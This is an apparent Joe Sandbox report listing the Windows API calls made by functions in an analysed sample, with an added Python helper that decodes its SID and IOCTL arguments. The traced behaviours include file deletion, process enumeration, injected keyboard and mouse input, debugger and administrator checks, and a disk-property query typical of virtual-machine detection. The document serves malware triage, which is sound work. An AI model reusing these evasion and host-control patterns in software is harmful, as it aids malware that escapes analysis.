                                                                                                                        • Opcode ID: 87c5870180fdbc500c10aca4dc230557b95ed7eda79566e1e5f61138330b3f44
                                                                                                                        • Instruction ID: 2d4d12c22c48b61d3cb1cb8e2e5b4d89f06f4ee6a5dea2ad1f8547dd8ab00426
                                                                                                                        • Opcode Fuzzy Hash: 87c5870180fdbc500c10aca4dc230557b95ed7eda79566e1e5f61138330b3f44
                                                                                                                        • Instruction Fuzzy Hash: 84C13471A04246ABEB249F3A8C85BEE7FB8FF91318F14459AE590DB251E730CE41D750
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                                                                                          • Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0057D420
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0057D470
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057D481
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057D498
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057D4A1
                                                                                                                        Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
APIs
Strings
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
APIs
• _wcslen.LIBCMT ref: 005864DC
• CoInitialize.OLE32(00000000), ref: 00586639
• CoCreateInstance.OLE32(005AFCF8,00000000,00000001,005AFB68,?), ref: 00586650
• CoUninitialize.OLE32 ref: 005868D4
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 005922E8
  • Part of subcall function 0058E4EC: GetWindowRect.USER32(?,?), ref: 0058E504
• GetDesktopWindow.USER32 ref: 00592312
• GetWindowRect.USER32(00000000), ref: 00592319
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00592355
• GetCursorPos.USER32(?), ref: 00592381
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005923DF
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForeground
• String ID:
• API String ID: 2387181109-0
APIs
  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00589B78
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00589C8B
  • Part of subcall function 00583874: GetInputState.USER32 ref: 005838CB
  • Part of subcall function 00583874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00583966
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00589BA8
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00589C75
Strings
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
APIs
  • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
• DefDlgProcW.USER32(?,?,?,?,?), ref: 00529A4E
• GetSysColor.USER32(0000000F), ref: 00529B23
• SetBkColor.GDI32(?,00000000), ref: 00529B36
Similarity
• API ID: Color$LongProcWindow
• String ID:
• API String ID: 3131106179-0
APIs
  • Part of subcall function 0059304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
  • Part of subcall function 0059304E: _wcslen.LIBCMT ref: 0059309B
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0059185D
• WSAGetLastError.WSOCK32 ref: 00591884
• bind.WSOCK32(00000000,?,00000010), ref: 005918DB
• WSAGetLastError.WSOCK32 ref: 005918E6
• closesocket.WSOCK32(00000000), ref: 00591915
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
                                                                                                                        • Opcode ID: 893a00421e68434c2c6070087901979c52133c2fde416e960db13dacc42aed01
                                                                                                                        • Instruction ID: f34e508edbbdb1eaaefda7c8993fd17b0bf63b156bacadfb7320719a1a8a5ba5
                                                                                                                        • Opcode Fuzzy Hash: 893a00421e68434c2c6070087901979c52133c2fde416e960db13dacc42aed01
                                                                                                                        • Instruction Fuzzy Hash: 1C218331740A115FE7208F2AC854B6E7FE5FF96325F198068E8468B351CB71DC46CB98
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                        • API String ID: 0-1546025612
                                                                                                                        • Opcode ID: 3d285605b9d2a835d8779eebecf449feb85882a3e5919315a1bb755c2c2b8fea
                                                                                                                        • Instruction ID: 8874fc9844aae64ebedaa98193ed84187a1ffb264a53b44f0b5359c1225db84e
                                                                                                                        • Opcode Fuzzy Hash: 3d285605b9d2a835d8779eebecf449feb85882a3e5919315a1bb755c2c2b8fea
                                                                                                                        • Instruction Fuzzy Hash: F8A26A74A0061ACBEF348F58C8A47FDBBB1BB54311F6485AAD815A7281EB709D85CB90
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 005782AA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen
                                                                                                                        • String ID: ($tb]$|
                                                                                                                        • API String ID: 1659193697-2890004336
                                                                                                                        • Opcode ID: 5fb283ef7e427f0eca6190a90db12b6a3cbba86eb4271a7777f13b7bef5ede2f
                                                                                                                        • Instruction ID: 5acc7c38a10b7b2a8190d46f6875fdd5a946307441f06f886ed1275ad3df5567
                                                                                                                        • Opcode Fuzzy Hash: 5fb283ef7e427f0eca6190a90db12b6a3cbba86eb4271a7777f13b7bef5ede2f
                                                                                                                        • Instruction Fuzzy Hash: B2323574A006059FCB28CF59D485A6ABBF0FF48710B15C96EE49ADB7A1EB70E941CB40
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0059A6AC
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0059A6BA
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0059A79C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0059A7AB
                                                                                                                          • Part of subcall function 0052CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00553303,?), ref: 0052CE8A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1991900642-0
                                                                                                                        • Opcode ID: d62e762831d03fa6115a8d8a4d5a681fa4c6dcb49215e780c74006db566b0b2a
                                                                                                                        • Instruction ID: 0f7578123f3f8661b9f3d33fd859809fff861ad850c5157a9e63722a22c109ae
                                                                                                                        • Opcode Fuzzy Hash: d62e762831d03fa6115a8d8a4d5a681fa4c6dcb49215e780c74006db566b0b2a
                                                                                                                        • Instruction Fuzzy Hash: 8E512B71508311AFD710EF24D88AAABBBE8FFC9754F00491DF59597291EB30E944CBA2
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0057AAAC
                                                                                                                        • SetKeyboardState.USER32(00000080), ref: 0057AAC8
                                                                                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0057AB36
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0057AB88
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: a7b9e625ec7f833e5aca24eb455cca2744b0684910cfdf10f673c823141e59c6
                                                                                                                        • Instruction ID: 203444b62a6dd7f5777a18ed7777f30a5a573b2bb8ea35d84a609d72279fbf84
                                                                                                                        • Opcode Fuzzy Hash: a7b9e625ec7f833e5aca24eb455cca2744b0684910cfdf10f673c823141e59c6
                                                                                                                        • Instruction Fuzzy Hash: A8311530A40208AEFB25CA64E805BFE7FAABBC5310F04C21AF58D561D0D7748985E7A2
                                                                                                                        APIs
                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 0058CE89
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0058CEEA
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 0058CEFE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorEventFileInternetLastRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 234945975-0
                                                                                                                        • Opcode ID: e9c1c0924759cbf3368b07cbf4399c80d699fd6c4b22a6eae431f719e46d389b
                                                                                                                        • Instruction ID: 717ba3dc2f06fa270d90f1c0f6ecd6b7908c38c7464b4538ed53b1bc01d854b1
                                                                                                                        • Opcode Fuzzy Hash: e9c1c0924759cbf3368b07cbf4399c80d699fd6c4b22a6eae431f719e46d389b
                                                                                                                        • Instruction Fuzzy Hash: 7521B0715003059BE731EF65D949BA67FFCFB51314F10481EEA46E2151E774ED089B60
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0054271A
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00542724
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00542731
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3906539128-0
                                                                                                                        • Opcode ID: afa0bad793a59e7ef57cef759c7177a981d01b9904b6c01d6fc933f25c2b7c4e
                                                                                                                        • Instruction ID: a7e356534833ece82dee2b925e8f95037e498253b70cb1e6148de0dc3a26d460
                                                                                                                        • Opcode Fuzzy Hash: afa0bad793a59e7ef57cef759c7177a981d01b9904b6c01d6fc933f25c2b7c4e
                                                                                                                        • Instruction Fuzzy Hash: EA31C27490122DABCB21DF68DD887DCBBB8BF18310F5041EAE80CA6260E7309F859F44
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 005851DA
                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00585238
                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 005852A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1682464887-0
                                                                                                                        • Opcode ID: 302896f6692914c909f31026dc2ae98f794663d7dc9fff567ab0d280a3bf993f
                                                                                                                        • Instruction ID: ccff98b3a51e8eda4305d98c6f91e0c6c59991862f3bc10c31d27e16c8ec55a6
                                                                                                                        • Opcode Fuzzy Hash: 302896f6692914c909f31026dc2ae98f794663d7dc9fff567ab0d280a3bf993f
                                                                                                                        • Instruction Fuzzy Hash: EC312C75A00619DFDB00EF54D888EADBFB5FF49314F048099E805AB362DB31E85ACB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0052FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00530668
                                                                                                                          • Part of subcall function 0052FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00530685
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
                                                                                                                        • GetLastError.KERNEL32 ref: 0057174A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
• Opcode ID: 38255b3548c2efa0097e8d0c13082998118dbc2bcdff3b47a8ef988657b3b109
• Instruction ID: de28525dfd52e3a4012d6f38bbe328d96869c7069b90e1cfbbb5f54c633fd75f
• Opcode Fuzzy Hash: 38255b3548c2efa0097e8d0c13082998118dbc2bcdff3b47a8ef988657b3b109
• Instruction Fuzzy Hash: 5911CEB2400305AFD718AF58EC8AD6ABBBDFF45714B20C52EE05A57281EB70BC419B24
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0057D608
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0057D645
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0057D650
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: c8c7cfe43975fe371337c872d3ecfa002b006c502362fbed1bf106f54566f85b
• Instruction ID: 97260a61659f020e052c7f1a407080e120ad8ae6da29ee8d527df9d05606bc67
• Opcode Fuzzy Hash: c8c7cfe43975fe371337c872d3ecfa002b006c502362fbed1bf106f54566f85b
• Instruction Fuzzy Hash: C2115E75E05228BFDB108F95EC45FAFBFBCEB45B50F108156F908E7290D6704A059BA1
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0057168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005716A1
• FreeSid.ADVAPI32(?), ref: 005716B1
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 94809f7e001e4ed01662eaaf9c3d4e79071f6493883b96a9ddbf9ebd256bffaa
• Instruction ID: 176b2a6727dfe6d7a91da12daf738ecc5d2fe21a0fde1488a30f27f53cf86fe0
• Opcode Fuzzy Hash: 94809f7e001e4ed01662eaaf9c3d4e79071f6493883b96a9ddbf9ebd256bffaa
• Instruction Fuzzy Hash: 89F0F47195030DFBDB00DFE49D89AAEBBBCFB08604F508565E501E2181E774AA489A54
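The AllocateAndInitializeSid / CheckTokenMembership / FreeSid chain above is the standard test for membership in BUILTIN\Administrators: RID 0x20 is SECURITY_BUILTIN_DOMAIN_RID and 0x220 is DOMAIN_ALIAS_RID_ADMINS, giving S-1-5-32-544 under the NT authority. The CreateFileW / DeviceIoControl / CloseHandle block two records earlier passes control code 0x2D1400, which is IOCTL_STORAGE_QUERY_PROPERTY (FILE_DEVICE_MASS_STORAGE, function 0x500, METHOD_BUFFERED), with a 12-byte STORAGE_PROPERTY_QUERY in and a 40-byte STORAGE_DEVICE_DESCRIPTOR out. The Python below decodes both directly from the report's "APIs" lines. It is an added triage helper, not Joe Sandbox code and not anything recovered from the sample; the SID identifier authority is an assumption (S-1-5), because the trace shows that argument only as a pointer ("?"), and the constant names are taken from the Windows SDK headers.

```python
"""Decode the numeric arguments in Joe Sandbox "APIs" lines.

Added triage helper written for this report; it is not Joe Sandbox code and
not part of the analysed sample. It parses call strings in the exact form the
report prints them and decodes two things worth knowing when reading the
function blocks: the SID that AllocateAndInitializeSid builds and the IOCTL
control code handed to DeviceIoControl. Constant names and values come from
the Windows SDK headers (winnt.h, winioctl.h).
"""
import re

# Constructed input: three "APIs" lines copied from this report.
API_LINES = [
    "AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,"
    "00000000,00000000,00000000,00000000,00000000,?,?), ref: 0057168C",
    "CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005716A1",
    "DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000),"
    " ref: 0057D645",
]

CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# winnt.h: sub-authority pairs that identify well-known local groups.
SECURITY_NT_AUTHORITY = 5  # assumption: the trace only shows a pointer here
WELL_KNOWN_RIDS = {
    (0x20, 0x220): "BUILTIN\\Administrators",
    (0x20, 0x221): "BUILTIN\\Users",
    (0x20, 0x222): "BUILTIN\\Guests",
}

# winioctl.h: CTL_CODE(DeviceType, Function, Method, Access) field names.
DEVICE_TYPES = {0x2D: "FILE_DEVICE_MASS_STORAGE"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
KNOWN_IOCTLS = {0x2D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}


def parse_call(line):
    """Split 'Api.DLL(args), ref: addr' into its parts; '?' means unknown."""
    m = CALL_RE.match(line.strip())
    if m is None:
        raise ValueError("not a Joe Sandbox API line: %r" % line)
    args = [None if a.strip() == "?" else int(a, 16) for a in m["args"].split(",")]
    return {"api": m["api"], "dll": m["dll"], "args": args, "ref": int(m["ref"], 16)}


def decode_sid(call, authority=SECURITY_NT_AUTHORITY):
    """Rebuild the SID from an AllocateAndInitializeSid call.

    args[1] is nSubAuthorityCount and args[2:] are the RIDs. The identifier
    authority is not visible in the trace, so S-1-5 is assumed; it is the
    only authority under which RIDs 32/544 are meaningful.
    """
    if call["api"] != "AllocateAndInitializeSid":
        raise ValueError("expected AllocateAndInitializeSid")
    count = call["args"][1]
    rids = tuple(call["args"][2:2 + count])
    sid = "S-1-%d-%s" % (authority, "-".join(str(r) for r in rids))
    return sid, WELL_KNOWN_RIDS.get(rids, "unknown")


def decode_ioctl(code):
    """Split a control code into its CTL_CODE fields (winioctl.h layout)."""
    return {
        "name": KNOWN_IOCTLS.get(code, "unknown"),
        "device_type": DEVICE_TYPES.get(code >> 16, hex(code >> 16)),
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "access": (code >> 14) & 0x3,  # 0 == FILE_ANY_ACCESS
    }


def decode_device_io_control(call):
    """Decode a DeviceIoControl call: control code plus the two buffer sizes."""
    if call["api"] != "DeviceIoControl":
        raise ValueError("expected DeviceIoControl")
    a = call["args"]
    info = decode_ioctl(a[1])
    info["in_size"] = a[3]   # 12 == sizeof(STORAGE_PROPERTY_QUERY)
    info["out_size"] = a[5]  # 40 == sizeof(STORAGE_DEVICE_DESCRIPTOR)
    return info


def triage(lines):
    """Decode every recognised call; other APIs are passed through with raw args."""
    out = {}
    for line in lines:
        call = parse_call(line)
        if call["api"] == "AllocateAndInitializeSid":
            out[call["api"]] = decode_sid(call)
        elif call["api"] == "DeviceIoControl":
            out[call["api"]] = decode_device_io_control(call)
        else:
            out[call["api"]] = call["args"]
    return out


if __name__ == "__main__":
    for api, decoded in triage(API_LINES).items():
        print(api, "->", decoded)
```

STORAGE_DEVICE_DESCRIPTOR carries the disk's vendor and product strings and its bus type, which is why this IOCTL appears both in ordinary hardware-inventory code and in virtual-machine checks; the report shows only the call and its buffer sizes, not what the result is compared against, so the decoder stops there.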
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000,?,005428E9), ref: 00534D09
                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000,?,005428E9), ref: 00534D10
                                                                                                                        • ExitProcess.KERNEL32 ref: 00534D22
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1703294689-0
                                                                                                                        • Opcode ID: 82bd4bc6b819be00dd79d5582f8343fdd539c6cf3c8a409646c44832efbf5928
